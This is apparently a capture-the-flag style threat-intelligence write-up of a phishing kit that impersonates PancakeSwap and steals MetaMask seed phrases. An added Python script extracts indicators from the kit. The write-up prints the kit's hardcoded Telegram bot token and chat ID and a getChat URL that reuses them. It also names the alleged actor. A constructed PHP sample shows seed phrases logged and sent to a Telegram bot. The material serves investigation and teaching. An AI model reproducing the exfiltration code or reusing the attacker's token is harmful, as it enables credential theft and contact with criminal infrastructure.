GrabThePhisher Lab

Lab category: Threat Intel

Lab can be found here.

For this lab we were given the following scenario:

A decentralized finance (DeFi) platform recently reported multiple user complaints about unauthorized fund withdrawals. A forensic review uncovered a phishing site impersonating the legitimate PancakeSwap exchange, luring victims into entering their wallet seed phrases. The phishing kit was hosted on a compromised server and exfiltrated credentials via a Telegram bot.

Your task is to conduct threat intelligence analysis on the phishing infrastructure, identify indicators of compromise (IoCs), and track the attacker’s online presence, including aliases and Telegram identifiers, to understand their tactics, techniques, and procedures (TTPs).

1. Which wallet is used for asking the seed phrase?

Listing the 'pankewk' directory, one subdirectory does not match the others: 'metamask'. That is the wallet whose seed phrase the kit asks for, so the answer is 'metamask'.

2. What is the file name that has the code for the phishing kit?

Since we are dealing with the 'metamask' wallet, we enter that directory, where we find the 'metamask.php' file. This is the file that implements the phishing kit.

3. In which language was the kit written?

Based on the extension and contents of the file found above, the language is 'php'.

4. What service does the kit use to retrieve the victim's machine information?

In the PHP file we can see which external API calls are made: one to Telegram and one to Sypex Geo. The Telegram call sends a message (that is the exfiltration channel), while the Sypex Geo call is an IP geolocation lookup on the victim, so the answer is 'sypex geo'.

5. How many seed phrases were already collected?

The PHP file also writes every captured phrase to the 'log.txt' file inside the 'log' directory. Opening 'log.txt' shows 3 lines of seed phrases, so the answer is '3'.

6. Could you please provide the seed phrase associated with the most recent phishing incident?

For this we simply take the last row of the 'log.txt' file from the previous question: the kit appends to the log, so the last line is the most recent entry.

7. Which medium was used for credential dumping? 

As mentioned in question 4, the second API call is a Telegram sendMessage request that delivers the captured data to the phisher, so the answer is 'Telegram'.

The bot token and chat ID hardcoded in the kit (questions 8 and 9) can be reused against Telegram's Bot API to identify the receiving account, using the getChat method:

https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564

8. What is the token for accessing the channel?

In the PHP file, inside the sendTel() function, there is a variable named 'token' holding the bot token: '5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10'.

9. What is the Chat ID for the phisher's channel? 

Again, in the sendTel() function of the PHP file, a variable named 'id' holds the chat ID the messages are sent to: '5442785564'.

10. What is the alias of the phish kit developer?

In the commented section near the top of the PHP file the developer signs off with 'Regards, j1j1b1s@m3r0', so the alias is 'j1j1b1s@m3r0'.

The answers to the last two questions come from the JSON response to the getChat request shown above, reading the appropriate fields:

{
  "ok": true,
  "result": {
    "id": 5442785564,
    "first_name": "Marcus",
    "last_name": "Aurelius",
    "username": "pumpkinboii",
    "type": "private",
    "can_send_gift": true,
    "active_usernames": [
      "pumpkinboii"
    ],
    "accepted_gift_types": {
      "unlimited_gifts": true,
      "limited_gifts": true,
      "unique_gifts": true,
      "premium_subscription": true
    },
    "max_reaction_count": 11,
    "accent_color_id": 6
  }
}

11. What is the full name of the Phish Actor?

From the above API response we find that the name is "Marcus Aurelius" 

12. What is the username of the Phish Actor?

From the above API response we find that the username is "pumpkinboii"
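The following Python script is an added example (not part of the lab, the write-up or the phishing kit) that automates what questions 4 and 7 to 12 did by hand: it pulls the bot token, chat ID, developer sign-off and contacted hosts out of the kit's PHP source with regular expressions, builds the getChat URL, and reduces a getChat JSON response to the actor identifiers. Because the write-up does not reproduce metamask.php, the PHP sample below is constructed: the body of sendTel(), the $token/$id variable names and the Sypex Geo request are assumptions about the kit's shape; only the token, chat ID, alias and the getChat fields are taken from this page. Nothing is sent over the network.

```python
"""Extract Telegram exfiltration IoCs from a PHP phishing kit and
resolve the receiving chat from a Bot API getChat response.

Added example for this write-up, not code from the lab or the kit."""
import json
import re

# Constructed stand-in for metamask.php. The write-up only reports the
# token, chat ID and sign-off; the sendTel() body, the $token/$id variable
# names and the Sypex Geo request are assumptions about the real kit.
SAMPLE_PHP = r'''<?php
/*
   MetaMask seed phrase grabber
   Regards, j1j1b1s@m3r0
*/
function sendTel($text) {
    $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";
    $id = "5442785564";
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$id&text=" . urlencode($text));
}
$geo = json_decode(file_get_contents("https://api.sypexgeo.net/json/" . $_SERVER['REMOTE_ADDR']), true);
file_put_contents("log/log.txt", $_POST['seed'] . "\n", FILE_APPEND);
'''

# getChat response as quoted in the write-up, trimmed to the fields used.
GETCHAT_RESPONSE = '''{"ok": true, "result": {"id": 5442785564, "first_name": "Marcus",
 "last_name": "Aurelius", "username": "pumpkinboii", "type": "private"}}'''

# Bot tokens are "<bot user id>:<35-char secret>"; the secret alphabet is
# letters, digits, '_' and '-'.
TOKEN_RE = re.compile(r"(?<!\d)(\d{8,10}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
# Chat IDs appear either as a PHP variable or directly in the query string.
CHAT_ID_RES = [
    re.compile(r"""\$(?:id|chat_id|chatid)\s*=\s*['"]?(-?\d{6,})"""),
    re.compile(r"chat_id=(-?\d{6,})"),
]
SIGNOFF_RE = re.compile(r"Regards,\s*([^\s*]+)")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def extract_kit_iocs(php_source: str) -> dict:
    """Return token, chat ID, developer alias and contacted hosts from kit source."""
    token = TOKEN_RE.search(php_source)
    chat_id = None
    for rx in CHAT_ID_RES:
        m = rx.search(php_source)
        if m:
            chat_id = m.group(1)
            break
    alias = SIGNOFF_RE.search(php_source)
    hosts = sorted(set(HOST_RE.findall(php_source)))
    return {
        "token": token.group(1) if token else None,
        "chat_id": chat_id,
        "alias": alias.group(1) if alias else None,
        "hosts": hosts,
        # Anything other than the Telegram API is a third-party service the
        # kit calls during the phish (here: IP geolocation of the victim).
        "third_party_hosts": [h for h in hosts if h != "api.telegram.org"],
    }


def getchat_url(token: str, chat_id: str) -> str:
    """Bot API call that resolves a chat ID to the account behind it."""
    return f"https://api.telegram.org/bot{token}/getChat?chat_id={chat_id}"


def parse_getchat(response_text: str) -> dict:
    """Reduce a getChat response to actor identifiers; fail loudly on errors."""
    data = json.loads(response_text)
    if not data.get("ok"):
        # Telegram answers ok=false with error_code/description, for example
        # once the token has been revoked.
        raise ValueError(f"getChat failed: {data.get('description', 'unknown error')}")
    result = data["result"]
    full_name = " ".join(p for p in (result.get("first_name"), result.get("last_name")) if p)
    return {
        "chat_id": result["id"],
        "chat_type": result.get("type"),
        "full_name": full_name,
        "username": result.get("username"),
    }


if __name__ == "__main__":
    iocs = extract_kit_iocs(SAMPLE_PHP)
    print(json.dumps(iocs, indent=2))
    print(getchat_url(iocs["token"], iocs["chat_id"]))
    print(parse_getchat(GETCHAT_RESPONSE))
```

Run it against the real metamask.php by reading the file into extract_kit_iocs(); the regexes are deliberately loose about variable names so they survive minor edits to the kit. Outside a lab, calling the Bot API with the attacker's token is an interaction with their infrastructure and should be cleared with the incident lead before it is done.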